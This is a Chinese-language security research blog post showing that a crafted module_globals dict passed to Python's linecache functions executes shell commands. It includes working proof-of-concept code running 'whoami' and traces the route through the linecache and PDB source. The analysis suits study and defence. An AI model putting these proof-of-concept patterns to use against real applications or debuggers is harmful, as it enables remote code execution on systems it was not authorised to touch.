聊聊由linecache库可能引起的RCE问题
近几天闲的去翻python的标准库找点乐子,偶然发现linecache里可能出现的RCE问题。于是就尝试构造了个PoC去打着玩。结果发现假如对这个库的某些函数调用不当真的可以RCE。这也许是最近发现的一个不太明显的有意思的sink点,故写一篇文字记录一下。
Proof of Concept (PoC)
我们可以使用linecache.getline来缓存特定文件的某一行。但是假设linecache.getline的第三个参数完全为用户可控,则可以导致RCE问题。对于linecache中的getlines,updatecache同理。而lazycache也可能触发此类问题。
我们看到:
import linecache
class evil():
def __init__(self):
self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
'__name__': 'whoami',
'__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
成功执行whoami

其中最后一行代码为sink点。它有如下变形:
a = linecache.getline('LamentXU', 114514, fake_moudle)
a = linecache.getlines('LamentXU', fake_moudle)
a = linecache.updatecache('LamentXU', fake_moudle)
均可以直接RCE。
import linecache
class evil():
def __init__(self):
self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
'__name__': 'whoami',
'__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
a = linecache.getlines('LamentXU', fake_moudle)
a = linecache.updatecache('LamentXU', fake_moudle)

Root Cause (原理)
linecache简介
linecache是一个python标准库。在python编程中,有时我们需要访问文件的特定行,而不是按顺序逐行读取。linecache模块就是为解决这类问题而设计的,它提供了一种高效的方式来缓存文件内容,使得我们可以快速访问文件的任意一行。
linecache模块的主要作用是从文件中读取指定行的内容,并将文件内容缓存起来。这样,在后续再次访问同一文件的其他行时,就可以直接从缓存中获取,避免了重复的文件 I/O 操作,从而提高了程序的性能。
假设有代码如下:
import linecache
print(linecache.getline('1.txt', 1).strip())
就可以读取1.txt的第一行,输出。getline的前两个参数必选,为文件路径和行序列。但是第三个参数,即module_globals是可选参数,通常用于指定模块的全局命名空间,一般使用默认值None即可。
但是,由于linecache对于module_globals的处理不当,使攻击者可以传入恶意的module_globals导致RCE。
利用链
我们跟进这个函数。
def getline(filename, lineno, module_globals=None):
"""Get a line for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
lines = getlines(filename, module_globals)
if 1 <= lineno <= len(lines):
return lines[lineno - 1]
return ''
发现其调用了getlines。跟进:
def getlines(filename, module_globals=None):
"""Get the lines for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
if filename in cache:
entry = cache[filename]
if len(entry) != 1:
return cache[filename][2]
try:
return updatecache(filename, module_globals)
except MemoryError:
clearcache()
return []
在linecache库里有一个全局字典cache。用于存放已经缓存的代码行。getlines首先检查文件是否已经被缓存在cache里。如果没有,进入updatecache函数。我们跟进。
def updatecache(filename, module_globals=None):
"""Update a cache entry and return its list of lines.
If something's wrong, print a message, discard the cache entry,
and return an empty list."""
if filename in cache:
if len(cache[filename]) != 1:
cache.pop(filename, None)
if not filename or (filename.startswith('<') and filename.endswith('>')):
return []
fullname = filename
try:
stat = os.stat(fullname)
except OSError:
basename = filename
# Realise a lazy loader based lookup if there is one
# otherwise try to lookup right now.
if lazycache(filename, module_globals):
try:
data = cache[filename][0]()
# print(data)
except (ImportError, OSError):
pass
else:
if data is None:
# No luck, the PEP302 loader cannot find the source
# for this module.
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
# Try looking through the module search path, which is only useful
# when handling a relative filename.
if os.path.isabs(filename):
return []
for dirname in sys.path:
try:
fullname = os.path.join(dirname, basename)
except (TypeError, AttributeError):
# Not sufficiently string-like to do anything useful with.
continue
try:
stat = os.stat(fullname)
break
except OSError:
pass
else:
return []
try:
with tokenize.open(fullname) as fp:
lines = fp.readlines()
except OSError:
return []
if lines and not lines[-1].endswith('\n'):
lines[-1] += '\n'
size, mtime = stat.st_size, stat.st_mtime
cache[filename] = size, mtime, lines, fullname
return lines
首先检查了filename是否缓存,若已经缓存则删除已缓存的内容。再检查filename是否存在。若不存在(OSError)则pass。进入lazycache,随后我们迎来了真正的sink:
data = cache[filename][0]()
updatecache函数会动态执行我们cache里的内容!所以,我们跟进lazycache函数,看看它是如何处理缓存的。
def lazycache(filename, module_globals):
"""Seed the cache for filename with module_globals.
The module loader will be asked for the source only when getlines is
called, not immediately.
If there is an entry in the cache already, it is not altered.
:return: True if a lazy load is registered in the cache,
otherwise False. To register such a load a module loader with a
get_source method must be found, the filename must be a cachable
filename, and the filename must not be already cached.
"""
if filename in cache:
# print(len(cache[filename]))
if len(cache[filename]) == 1:
return True
else:
return False
# print('he')
if not filename or (filename.startswith('<') and filename.endswith('>')):
return False
# Try for a __loader__, if available
if module_globals and '__loader__' in module_globals:
name = module_globals.get('__name__')
loader = module_globals['__loader__']
get_source = getattr(loader, 'get_source', None)
# print(name, loader, get_source)
if name and get_source:
get_lines = functools.partial(get_source, name)
cache[filename] = (get_lines,)
return True
return False
到这里就有意思了。在程序的预期里,module_globals应该是一个全局命名空间,所以有__name__和__loader__。这个函数会直接取出__loader__里的get_source并把__name__作为它的参数,返回一个functools.partial。那么,如何利用呢?
fake_moudle = {
'__name__': 'whoami',
'__loader__': evil()
}
我们构造这个module_globals。可以看到我们重定义了__name__和__loader__。这里我们只需要在evil这个类里写上恶意的get_source函数,这个函数就会得到执行!
import linecache
class evil():
def __init__(self):
self.get_source = lambda a: __import__('os').system(a)
fake_moudle = {
'__name__': 'whoami',
'__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
但是如果这样的话,会报错。我们看到代码:
try:
data = cache[filename][0]()
# print(data)
except (ImportError, OSError):
pass
else:
if data is None:
# No luck, the PEP302 loader cannot find the source
# for this module.
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
动态执行后,会检查返回值是否为None。所以我们这里还要使得lambda的返回值为None。修改PoC:
import linecache
class evil():
def __init__(self):
self.get_source = lambda a: [__import__('os').system(a), None][1]
fake_moudle = {
'__name__': 'whoami',
'__loader__': evil()
}
a = linecache.getline('LamentXU', 114514, fake_moudle)
即可成功RCE
Special Tricks (特殊利用)
假设lazycache的参数可控,我们可以往cache里任意写。这其实没啥用,除非服务端手动去执行lazycache的代码,如下:
import linecache
class evil():
def __init__(self):
self.get_source = lambda : __import__('os').system('whoami')
fake_moudle = {
'__name__': 'LamentXU',
'__loader__': evil()
}
a = linecache.lazycache('1', fake_moudle)
for i in linecache.cache.values():
for j in i:
j.func()
同样可以达到RCE的效果。
So What?
看到这里你可能会想:linecache的第三个参数怎么会可控呢?我们来看:
在python的PDB中,有调用了如下函数:
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
这个函数在启动PDB的时候会自动调用,可以打印stack的信息。我们跟进print_stack_entry
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
prefix = '> '
else:
prefix = ' '
self.message(prefix +
self.format_stack_entry(frame_lineno, prompt_prefix))
跟进format_stack_entry
def format_stack_entry(self, frame_lineno, lprefix=': '):
"""Return a string with information about a stack entry.
The stack entry frame_lineno is a (frame, lineno) tuple. The
return string contains the canonical filename, the function name
or '<lambda>', the input arguments, the return value, and the
line of code (if it exists).
"""
import linecache, reprlib
frame, lineno = frame_lineno
filename = self.canonic(frame.f_code.co_filename)
s = '%s(%r)' % (filename, lineno)
if frame.f_code.co_name:
s += frame.f_code.co_name
else:
s += "<lambda>"
s += '()'
if '__return__' in frame.f_locals:
rv = frame.f_locals['__return__']
s += '->'
s += reprlib.repr(rv)
line = linecache.getline(filename, lineno, frame.f_globals)
if line:
s += lprefix + line.strip()
return s
此处的frame.f_globals为可控的getline参数。可以完成RCE。也就是说,同pickle类似,假设使用PDB调试恶意的dump。可能导致远程代码执行。

浙公网安备 33010602011771号